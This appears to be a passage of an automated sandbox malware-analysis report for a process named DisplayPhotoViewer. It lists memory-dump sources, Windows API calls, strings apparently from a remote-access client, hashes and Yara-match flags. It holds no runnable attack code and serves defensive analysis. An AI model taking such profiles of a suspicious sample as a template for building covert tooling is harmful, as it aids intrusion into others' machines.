                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterLeave$Sleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 2348874005-0
                                                                                                    • Opcode ID: 27e3f2ba4daa42d75924260dfed5ba8ced7b1a2898e6ee1a0775e7e51bc164c6
                                                                                                    • Instruction ID: 5c0b0e6237950cfc863c26e0e1865889bee6ac4f488e388052f5148adeadb31d
                                                                                                    • Opcode Fuzzy Hash: 27e3f2ba4daa42d75924260dfed5ba8ced7b1a2898e6ee1a0775e7e51bc164c6
                                                                                                    • Instruction Fuzzy Hash: 1501713A304350ABCF519FA4DC88A977BA9FF4DA50B08C409F59A87391D771D440C7A9
                                                                                                    APIs
                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000100,00000000,00000000), ref: 1070C2C1
                                                                                                    • GetLastError.KERNEL32 ref: 1070C2CB
                                                                                                    • ReadFile.KERNEL32(?,?,00000001,00000000,00000000), ref: 1070C391
                                                                                                    • GetLastError.KERNEL32 ref: 1070C39B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 1948546556-0
                                                                                                    • Opcode ID: b678442f16a60e6423508f4e3f6d60bb23680cc84a5c09bfedaed9ca523edd31
                                                                                                    • Instruction ID: 8a0e605970556834e0796a0b69968d56a2b52bf72ac9a60869b94dd26ea6d076
                                                                                                    • Opcode Fuzzy Hash: b678442f16a60e6423508f4e3f6d60bb23680cc84a5c09bfedaed9ca523edd31
                                                                                                    • Instruction Fuzzy Hash: A651C134A1438DDFDB118F98C880B99BBF4FF07344F218699E8959B29AC370D946CB12
                                                                                                    APIs
                                                                                                    • EnterCriticalSection.KERNEL32(?,218EC38C,00000000,00002710,00000001,11025830,218EC38C,00000000,00002710,?,?,00000000,11177228,000000FF,?,110279AE), ref: 110639BA
                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 11063A80
                                                                                                      • Part of subcall function 111075F0: InterlockedDecrement.KERNEL32(?), ref: 111075F8
                                                                                                    Strings
                                                                                                    • EnumConn error, idata=%x, xrefs: 11063AF6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$DecrementEnterInterlockedLeave
                                                                                                    • String ID: EnumConn error, idata=%x
                                                                                                    • API String ID: 1807080765-705201588
                                                                                                    • Opcode ID: 3a508617cd74928a7c96c9a6c438ec5cdf22aebab3ed76894de4212ceeedf64a
                                                                                                    • Instruction ID: 17f3c0e61b801fee071ccd4bb8b63526ea1f2ab35179e33c299b0af982ef43b0
                                                                                                    • Opcode Fuzzy Hash: 3a508617cd74928a7c96c9a6c438ec5cdf22aebab3ed76894de4212ceeedf64a
                                                                                                    • Instruction Fuzzy Hash: C6519D75E087468FDB25CF55C480BAAF7F9FB45318F1046ADC85A9BA81D731A841CB90
                                                                                                    APIs
                                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 11151786
                                                                                                    • SysStringByteLen.OLEAUT32(?), ref: 11151791
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ByteChangeStringTypeVariant
                                                                                                    • String ID:
                                                                                                    • API String ID: 4048352505-0
                                                                                                    • Opcode ID: 5cf9ba5d4f1cef86f27e16426fd535be8c5cbc6b65dedc4a04e4e4a76ccfe586
                                                                                                    • Instruction ID: 8c2302e4f832c5313c0500b49527ef0deb6e400fdf8ff0abdd79b75311441025
                                                                                                    • Opcode Fuzzy Hash: 5cf9ba5d4f1cef86f27e16426fd535be8c5cbc6b65dedc4a04e4e4a76ccfe586
                                                                                                    • Instruction Fuzzy Hash: B2418F79600605AFDB92DF9CCC80EAFBBB9EFC6704F108615F925DB244D670A941CBA0
                                                                                                    APIs
                                                                                                    • SetLastError.KERNEL32(00000057,0BA6EEE0,00000001,00000000,00000000,75C05440,?,00000000,11130F55), ref: 110E5524
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    • InitPlugin(0x%08x, %d), xrefs: 110E5402
                                                                                                    • NSSClientPlugin.cpp, xrefs: 110E544B
                                                                                                    • m_plugin_table[pluginid] == NULL, xrefs: 110E5450
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$ExitMessageProcesswsprintf
                                                                                                    • String ID: InitPlugin(0x%08x, %d)$NSSClientPlugin.cpp$m_plugin_table[pluginid] == NULL
                                                                                                    • API String ID: 73808336-146751015
                                                                                                    • Opcode ID: afa4c191b4a11e46e575e84e228cd875ee70c10cd971d90b88d8bbb483e6f22e
                                                                                                    • Instruction ID: fa2e4c6332bb9c1984046545c0499ba7b14bebca60f4c118724344c3fe6b1557
                                                                                                    • Opcode Fuzzy Hash: afa4c191b4a11e46e575e84e228cd875ee70c10cd971d90b88d8bbb483e6f22e
                                                                                                    • Instruction Fuzzy Hash: BA412A79E06206AFEB00CBA6DC44B9EBBF89F54758F004569EC01D7380FB71AA00C7A1
                                                                                                    APIs
                                                                                                    • WriteFile.KERNEL32(?,?,?,00000000,00000000,1070C70A,00000000,00001000), ref: 1070C11E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3934441357-0
                                                                                                    • Opcode ID: 11fc83bf233d502a807eb2f0ab1b972baeb05de409a6ed9833967058b92f2189
                                                                                                    • Instruction ID: 14ac855d441a17daf4156a7ff5e6e6a20f998f52faaa3ed227c84ffda7febd2a
                                                                                                    • Opcode Fuzzy Hash: 11fc83bf233d502a807eb2f0ab1b972baeb05de409a6ed9833967058b92f2189
                                                                                                    • Instruction Fuzzy Hash: DA514CB1A0025CEFDB02CF68CC85A9D7BF4FF46390F2186A5E8159B25AD770DA40DB60
                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1105D29C
                                                                                                    • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 1105D2F4
                                                                                                    • RegEnumValueA.ADVAPI32(?,00000001,?,00000080,00000000,?,?,00000480), ref: 1105D3E3
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 1105D3F4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: EnumValue$CloseOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3785232357-0
                                                                                                    • Opcode ID: 655ba5674b5da0d14a8c0d024d204b748ccab103b288080bd324ef5a96fcb515
                                                                                                    • Instruction ID: 0ec56bbf0fa01af7698538f10635e60369797716f7b9b0e4c5c94c10d7a1f6d4
                                                                                                    • Opcode Fuzzy Hash: 655ba5674b5da0d14a8c0d024d204b748ccab103b288080bd324ef5a96fcb515
                                                                                                    • Instruction Fuzzy Hash: EB414FB59006199BDBA0CB54CC84FDFBBB8EB44305F0085D9E649D7141EB709B89CFA1
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _memmove
                                                                                                    • String ID:
                                                                                                    • API String ID: 4104443479-0
                                                                                                    • Opcode ID: c616c7afdffe3b10bc214a725739a1f5fe0c5b56c0e8f0299b435af8898d2b75
                                                                                                    • Instruction ID: 4bf528ea9841c980b0a3bb76893910a3b13b0c695b17b1c75d6bb0c814f4e49b
                                                                                                    • Opcode Fuzzy Hash: c616c7afdffe3b10bc214a725739a1f5fe0c5b56c0e8f0299b435af8898d2b75
                                                                                                    • Instruction Fuzzy Hash: 8A31A2B6B006019FDB14CEADDDC196BF7AAEBD4615708C52EE906CB344EA71F901C6A0
                                                                                                    APIs
                                                                                                    • InterlockedIncrement.KERNEL32(10723E48), ref: 10704D45
                                                                                                    • InterlockedDecrement.KERNEL32(10723E48), ref: 10704D54
                                                                                                    • InterlockedDecrement.KERNEL32(10723E48), ref: 10704D87
                                                                                                    • InterlockedDecrement.KERNEL32(10723E48), ref: 10704E1F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Interlocked$Decrement$Increment
                                                                                                    • String ID:
                                                                                                    • API String ID: 2574743344-0
                                                                                                    • Opcode ID: cbd18e2f06b2efacc244ea74ea770374ba9bd6ca539970eee70193cb534b8f4f
                                                                                                    • Instruction ID: 364370022bc2e34e46ff2f837a9ef0e200c31e305af6e81e2dffc0eecca8c16e
                                                                                                    • Opcode Fuzzy Hash: cbd18e2f06b2efacc244ea74ea770374ba9bd6ca539970eee70193cb534b8f4f
                                                                                                    • Instruction Fuzzy Hash: C831D2B1A04265FFEB120B60EC89B9E7FE8EB07B61F104259F644952D8CE745AC0D7A0
                                                                                                    APIs
                                                                                                    • InterlockedIncrement.KERNEL32(10723E48), ref: 10704FBB
                                                                                                    • InterlockedDecrement.KERNEL32(10723E48), ref: 10704FCA
                                                                                                    • InterlockedDecrement.KERNEL32(10723E48), ref: 10704FFD
                                                                                                    • InterlockedDecrement.KERNEL32(10723E48), ref: 10705095
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Interlocked$Decrement$Increment
                                                                                                    • String ID:
                                                                                                    • API String ID: 2574743344-0
                                                                                                    • Opcode ID: d18788f57dd83e9ac12c9c8b13a096e01fcdb64ff5da74fa55eaa86feb61763a
                                                                                                    • Instruction ID: 4f01fa88978045918241413ca5a3a4c0a8af3a7e14be92d8bca0dab652a89164
                                                                                                    • Opcode Fuzzy Hash: d18788f57dd83e9ac12c9c8b13a096e01fcdb64ff5da74fa55eaa86feb61763a
                                                                                                    • Instruction Fuzzy Hash: 8931DD71A04266EFEB120B60EC89BAF7FE4EB07760F148355F544592D8DAB45AC0CBA0
                                                                                                    APIs
                                                                                                    • DeleteObject.GDI32(?), ref: 1111D169
                                                                                                    • GlobalDeleteAtom.KERNEL32 ref: 1111D177
                                                                                                    • CloseHandle.KERNEL32(?), ref: 1111D188
                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 1111D192
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Delete$AtomCloseCriticalGlobalHandleObjectSection
                                                                                                    • String ID:
                                                                                                    • API String ID: 2137257056-0
                                                                                                    • Opcode ID: dc2b059acc622a1a3680aa8f2dd746bf4887317ddde32d325986878ca78a8c13
                                                                                                    • Instruction ID: 8c9ff61caaab508548d8c931887f3f2b32507cee037fa3ecd8580529de34bd54
                                                                                                    • Opcode Fuzzy Hash: dc2b059acc622a1a3680aa8f2dd746bf4887317ddde32d325986878ca78a8c13
                                                                                                    • Instruction Fuzzy Hash: B531A0B5700B015BDA10EB75DD84B6FF7AAAF84708F54442CE95A8B244EA31F801CB51
                                                                                                    APIs
                                                                                                      • Part of subcall function 10707967: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,10708E6F,00000002,?,?,5C74726F,1070599D,?,107059D7,10712290,10712290,00000040,10702706), ref: 107079A4
                                                                                                      • Part of subcall function 10707967: EnterCriticalSection.KERNEL32(?,?,?,10708E6F,00000002,?,?,5C74726F,1070599D,?,107059D7,10712290,10712290,00000040,10702706,?), ref: 107079BF
                                                                                                    • InitializeCriticalSection.KERNEL32(00000068,00000100,00000080,?,00000000,10712290,10712290,1070C5F8,10712291,00000000,00000000), ref: 1070BC2A
                                                                                                    • EnterCriticalSection.KERNEL32(00000068,00000100,00000080,?,00000000,10712290,10712290,1070C5F8,10712291,00000000,00000000), ref: 1070BC3F
                                                                                                    • LeaveCriticalSection.KERNEL32(00000068,?,00000000,10712290,10712290,1070C5F8,10712291,00000000,00000000), ref: 1070BC4C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmp
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterInitialize$Leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 713024617-3916222277
                                                                                                    • Opcode ID: 5afe42424257d4c71e7ee157c7a10a5e51630bb7ce209fba5b2492519c0fb7b0
                                                                                                    • Instruction ID: 0c41087d6cabbb073b12693cec8dc4fceecf23ae13ce8836ea2e741243a47f9c
                                                                                                    • Opcode Fuzzy Hash: 5afe42424257d4c71e7ee157c7a10a5e51630bb7ce209fba5b2492519c0fb7b0
                                                                                                    • Instruction Fuzzy Hash: DC3103726043459FE3008F60ECC8B6B77D4FB46328F258B2DE566871D5DBB0EA488765
                                                                                                    APIs
                                                                                                      • Part of subcall function 111077A0: _malloc.LIBCMT ref: 111077B9
                                                                                                      • Part of subcall function 111077A0: wsprintfA.USER32 ref: 111077D4
                                                                                                      • Part of subcall function 111077A0: _memset.LIBCMT ref: 111077F7
                                                                                                    • std::exception::exception.LIBCMT ref: 1100BA70
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 1100BA85
                                                                                                    • std::exception::exception.LIBCMT ref: 1100BA94
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 1100BAA9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Exception@8Throwstd::exception::exception$_malloc_memsetwsprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 1651403513-0
                                                                                                    • Opcode ID: 4c2c56a0f462b3ba29ae9e57cc29c94ac5cd7717c09edcf52774a7d665538cfd
                                                                                                    • Instruction ID: 6dcaf9a2e97153f1f87de90c54018d9e8ce836376deaebf966d319155ee6a7e2
                                                                                                    • Opcode Fuzzy Hash: 4c2c56a0f462b3ba29ae9e57cc29c94ac5cd7717c09edcf52774a7d665538cfd
                                                                                                    • Instruction Fuzzy Hash: 3A31AEB5D04A089FC751CF98D880A9AFBF4EF59214F54856EE85A97700E731EA04CBA2
                                                                                                    APIs
                                                                                                    • Sleep.KERNEL32(000001F4,00000000,?,00000000,-111E103C), ref: 1103B581
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
